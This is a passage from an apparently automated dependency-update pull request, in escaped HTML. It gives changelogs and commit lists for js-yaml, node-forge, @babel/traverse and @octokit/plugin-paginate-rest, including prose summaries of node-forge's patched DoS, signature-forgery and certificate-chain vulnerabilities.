\u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `node-forge` from 1.3.0 to 1.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/digitalbazaar/forge/blob/main/CHANGELOG.md\"\u003enode-forge's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.4.0 - 2026-03-24\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Denial of Service in \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eA Denial of Service (DoS) vulnerability exists due to an infinite loop in\nthe \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e function (inherited from the bundled jsbn\nlibrary). When \u003ccode\u003emodInverse()\u003c/code\u003e is called with a zero value as input, the\ninternal Extended Euclidean Algorithm enters an unreachable exit condition,\ncausing the process to hang indefinitely and consume 100% CPU.\u003c/li\u003e\n\u003cli\u003eReported by Kr0emer.\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33891\"\u003eCVE-2026-33891\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\"\u003eGHSA-5gfm-wpxj-wjgq\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in RSA-PKCS due to ASN.1 extra field.\n\u003cul\u003e\n\u003cli\u003eRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low\npublic exponent keys (e=3). Attackers can forge signatures by stuffing\n\u0026quot;garbage\u0026quot; bytes within the ASN.1 structure in order to construct a\nsignature that passes verification, enabling Bleichenbacher style forgery.\nThis issue is similar to CVE-2022-24771, but adds bytes in an addition\nfield within the ASN.1 structure, rather than outside of it.\u003c/li\u003e\n\u003cli\u003eAdditionally, forge does not validate that signatures include a minimum of\n8 bytes of padding as defined by the specification, providing attackers\nadditional space to construct Bleichenbacher forgeries.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33894\"\u003eCVE-2026-33894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\"\u003eGHSA-ppp5-5v6c-4jwp\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in Ed25519 due to missing S \u0026lt; L check.\n\u003cul\u003e\n\u003cli\u003eEd25519 signature verification accepts forged non-canonical signatures\nwhere the scalar S is not reduced modulo the group order (S \u0026gt;= L). A valid\nsignature and its S + L variant both verify in forge, while Node.js\ncrypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the\nspecification. This class of signature malleability has been exploited in\npractice to bypass authentication and authorization logic (see\nCVE-2026-25793, CVE-2022-35961). Applications relying on signature\nuniqueness (i.e., dedup by signature bytes, replay tracking, signed-object\ncanonicalization checks) may be bypassed.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33895\"\u003eCVE-2026-33895\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw\"\u003eGHSA-q67f-28xg-22rw\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: \u003ccode\u003ebasicConstraints\u003c/code\u003e bypass in certificate chain verification.\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epki.verifyCertificateChain()\u003c/code\u003e does not enforce RFC 5280 \u003ccode\u003ebasicConstraints\u003c/code\u003e\nrequirements when an intermediate certificate lacks both the\n\u003ccode\u003ebasicConstraints\u003c/code\u003e and \u003ccode\u003ekeyUsage\u003c/code\u003e extensions. This allows any leaf\ncertificate (without these extensions) to act as a CA and sign other\ncertificates, which node-forge will accept as valid.\u003c/li\u003e\n\u003cli\u003eReported by Doruk Tan Ozturk (\u003ca href=\"https://github.com/peaktwilight\"\u003e\u003ccode\u003e@​peaktwilight\u003c/code\u003e\u003c/a\u003e) - doruk.ch\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33896\"\u003eCVE-2026-33896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25\"\u003eGHSA-2328-f5f3-gj25\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/fa385f92440879601240020f158bed68e444e83a\"\u003e\u003ccode\u003efa385f9\u003c/code\u003e\u003c/a\u003e Release 1.4.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/07d4e162762ed4fdab5caca9ebf78237fcf85339\"\u003e\u003ccode\u003e07d4e16\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/cb90fd92091ee34e4abab3ad0c835eeea3d06c3e\"\u003e\u003ccode\u003ecb90fd9\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/963e7c5c7b0f03de1b28a1e5a42a6bafda4cf711\"\u003e\u003ccode\u003e963e7c5\u003c/code\u003e\u003c/a\u003e Add unit test for \u0026quot;pseudonym\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/f0b6f5b7c5d1c918240e975e0cade4f47d005446\"\u003e\u003ccode\u003ef0b6f5b\u003c/code\u003e\u003c/a\u003e Add pseudonym OID\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/3df48a311d4b53dc6493b7a47a8d07f3669957d9\"\u003e\u003ccode\u003e3df48a3\u003c/code\u003e\u003c/a\u003e Fix missing CVE ID.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90\"\u003e\u003ccode\u003e2e49283\u003c/code\u003e\u003c/a\u003e Add x509 \u003ccode\u003ebasicConstraints\u003c/code\u003e check.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85\"\u003e\u003ccode\u003ebdecf11\u003c/code\u003e\u003c/a\u003e Add canonical signature scaler check for S \u0026lt; L.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/af094e69c60ac5f7b29f2b1957c53ae5e12fd4a0\"\u003e\u003ccode\u003eaf094e6\u003c/code\u003e\u003c/a\u003e Add RSA padding and DigestInfo length checks.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/796eeb1673f6ec636fda02dfc295047d9f7aefe0\"\u003e\u003ccode\u003e796eeb1\u003c/code\u003e\u003c/a\u003e Improve jsbn fix.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/digitalbazaar/forge/compare/v1.3.0...v1.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.14.2 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/traverse's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e@​octokit/plugin-paginate-rest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca 